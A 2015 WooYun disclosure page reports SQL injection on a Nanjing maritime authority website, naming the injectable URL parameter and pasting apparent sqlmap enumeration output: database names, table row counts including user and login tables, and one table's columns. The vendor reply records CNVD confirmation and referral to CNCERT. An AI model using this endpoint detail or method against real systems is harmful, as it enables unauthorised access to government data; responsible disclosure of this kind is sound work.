当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103562

漏洞标题:南京市海事局存在SQL注入漏洞

相关厂商:南京市地方海事局

漏洞作者: 路人甲

提交时间:2015-03-26 12:03

修复时间:2015-05-15 08:26

公开时间:2015-05-15 08:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

南京市海事局存在漏洞。什么信息我也看不懂

详细说明:

这么晚了。要睡觉了
http://www.msaonline.gov.cn/xx_SJshow.aspx?id=2015/3/9/P2015392920269b384a5fb41.html
这后面虽然是html
但是依然挡不住注入的 脚步呀

1.png


available databases [11]:
[*] CBJY
[*] hsqx
[*] HSZXWEB
[*] master
[*] meanssys_hsj20120328
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] qx_njhs
[*] tempdb

漏洞证明:

available databases [11]:
[*] CBJY
[*] hsqx
[*] HSZXWEB
[*] master
[*] meanssys_hsj20120328
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] qx_njhs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: HSZXWEB
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.GUEST_LIST                       | 987284  |
| dbo.Info_Info                        | 2023    |
| dbo.QY_LISTold                       | 588     |
| dbo.SWITCH_FILE                      | 558     |
| dbo.QY_LIST                          | 411     |
| dbo.XM_WJ_LIST                       | 276     |
| dbo.Info_Class                       | 156     |
| dbo.CYRY_LIST                        | 120     |
| dbo.Info_Emp                         | 69      |
| dbo.sqlmapoutput                     | 44      |
| dbo.D99_Tmp                          | 33      |
| dbo.Info_Info_date                   | 23      |
| dbo.sysconstraints                   | 7       |
| dbo.T_XK_LIST                        | 7       |
| dbo.Users                            | 7       |
| dbo.Info_Template                    | 4       |
| dbo.D99_CMD                          | 3       |
| dbo.Info_File                        | 3       |
| dbo.Info_LYB                         | 3       |
| dbo.syssegments                      | 3       |
| dbo.QUESTION_AND_ANSWER              | 1       |
| dbo.T_XK_LIST_OLD                    | 1       |
+--------------------------------------+---------+
Database: qx_njhs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.MENU_NODESold                    | 960     |
| dbo.T_User_Groups                    | 631     |
| dbo.T_DICT_USERold                   | 437     |
| dbo.T_ROLE_MENU                      | 290     |
| dbo.MENU_NODES                       | 190     |
| dbo.T_USERS                          | 104     |
| dbo.T_MOD_ROLE                       | 71      |
| dbo.T_DICT_USER                      | 52      |
| dbo.T_MDL_FUNC                       | 43      |
| dbo.T_USER_GRP                       | 23      |
| dbo.MENU_ORGANIZE                    | 18      |
| dbo.T_ORGANIZE                       | 16      |
| dbo.T_MDL_DATA                       | 10      |
| dbo.MENU_TYPE                        | 5       |
| dbo.syssegments                      | 3       |
| dbo.sysconstraints                   | 2       |
| dbo.T_DICT_SYS                       | 1       |
+--------------------------------------+---------+
Database: hsqx
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.T_ROLE_MENU                      | 123     |
| dbo.T_User_Groups                    | 99      |
| dbo.MENU_NODES                       | 83      |
| dbo.T_USERS                          | 44      |
| dbo.T_MOD_ROLE                       | 14      |
| dbo.T_USER_GRP                       | 14      |
| dbo.T_ORGANIZE                       | 8       |
| dbo.syssegments                      | 3       |
| dbo.sysconstraints                   | 2       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6922    |
| dbo.RTblIfaceHier                    | 3349    |
| dbo.RTblVersionAdminInfo             | 2333    |
| dbo.RTblVersions                     | 2333    |
| dbo.RTblNamedObj                     | 2196    |
| dbo.sysdbmaintplan_history           | 1225    |
| dbo.RTblIfaceMem                     | 1189    |
| dbo.backupfile                       | 810     |
| dbo.RTblPropDefs                     | 797     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 453     |
| dbo.backupset                        | 405     |
| dbo.backupmediafamily                | 404     |
| dbo.backupmediaset                   | 404     |
| dbo.RTblProps                        | 393     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.sysjobhistory                    | 272     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 101     |
| dbo.RTblClassExtension               | 69      |
| dbo.RTblSites                        | 44      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 17      |
| dbo.sysalerts                        | 9       |
| dbo.sysdbmaintplans                  | 4       |
| dbo.sysdbmaintplan_databases         | 3       |
| dbo.sysdbmaintplan_jobs              | 3       |
| dbo.sysdtscategories                 | 3       |
| dbo.sysjobs                          | 3       |
| dbo.sysjobs_view                     | 3       |
| dbo.sysjobschedules                  | 3       |
| dbo.sysjobservers                    | 3       |
| dbo.sysjobsteps                      | 3       |
| dbo.syssegments                      | 3       |
| dbo.restorefile                      | 2       |
| dbo.restorefilegroup                 | 1       |
| dbo.restorehistory                   | 1       |
| dbo.RTblDatabaseVersion              | 1       |
| dbo.syscachedcredentials             | 1       |
| dbo.systargetservers_view            | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 3617    |
| INFORMATION_SCHEMA.ROUTINES          | 1019    |
| dbo.spt_values                       | 730     |
| INFORMATION_SCHEMA.COLUMNS           | 392     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 159     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 63      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 36      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 34      |
| dbo.spt_server_info                  | 29      |
| INFORMATION_SCHEMA.VIEWS             | 26      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.SCHEMATA          | 11      |
| dbo.spt_datatype_info_ext            | 10      |
| dbo.syssegments                      | 3       |
| dbo.MSreplication_options            | 2       |
| dbo.syslogins                        | 2       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
| dbo.sysoledbusers                    | 1       |
+--------------------------------------+---------+
Database: model
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: CBJY
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.GUEST_LIST                       | 23915   |
| dbo.Info_Info                        | 1336    |
| dbo.QY_LISTold                       | 588     |
| dbo.TCB_ChuanBoXX                    | 445     |
| dbo.QY_LIST                          | 411     |
| dbo.XM_WJ_LIST                       | 285     |
| dbo.Info_Emp                         | 69      |
| dbo.TYH_YongHuxx                     | 25      |
| dbo.Info_Class                       | 21      |
| dbo.SWITCH_FILE                      | 16      |
| dbo.TSJ_ChuanBoLX                    | 13      |
| dbo.sysconstraints                   | 10      |
| dbo.T_XK_LIST                        | 7       |
| dbo.Info_Template                    | 4       |
| dbo.TSJ_ChuanBoHQ                    | 4       |
| dbo.TSJ_ChuanBoZZ                    | 4       |
| dbo.Info_File                        | 3       |
| dbo.syssegments                      | 3       |
| dbo.TSJ_ChuanLing                    | 3       |
| dbo.QUESTION_AND_ANSWER              | 1       |
| dbo.T_XK_LIST_OLD                    | 1       |
| dbo.Users                            | 1       |
+--------------------------------------+---------+
Database: meanssys_hsj20120328
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.MENU_NODESold                    | 960     |
| dbo.T_User_Groups                    | 635     |
| dbo.T_DICT_USERold                   | 437     |
| dbo.T_ROLE_MENU                      | 291     |
| dbo.MENU_NODES                       | 191     |
| dbo.T_USERS                          | 104     |
| dbo.T_MOD_ROLE                       | 71      |
| dbo.T_DICT_USER                      | 52      |
| dbo.T_MDL_FUNC                       | 43      |
| dbo.T_USER_GRP                       | 23      |
| dbo.MENU_ORGANIZE                    | 18      |
| dbo.T_ORGANIZE                       | 16      |
| dbo.T_MDL_DATA                       | 10      |
| dbo.MENU_TYPE                        | 5       |
| dbo.syssegments                      | 3       |
| dbo.sysconstraints                   | 2       |
| dbo.T_DICT_SYS                       | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.Shippers                         | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
<code>Database: HSZXWEB
Table: GUEST_LIST
[6 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| GUEST_END    | datetime |
| GUEST_ID     | varchar  |
| GUEST_IP     | varchar  |
| GUEST_LAYUAN | varchar  |
| GUEST_TIME   | datetime |
| WF_NAME      | varchar  |
+--------------+----------+


</code>
看不懂了

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-31 08:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无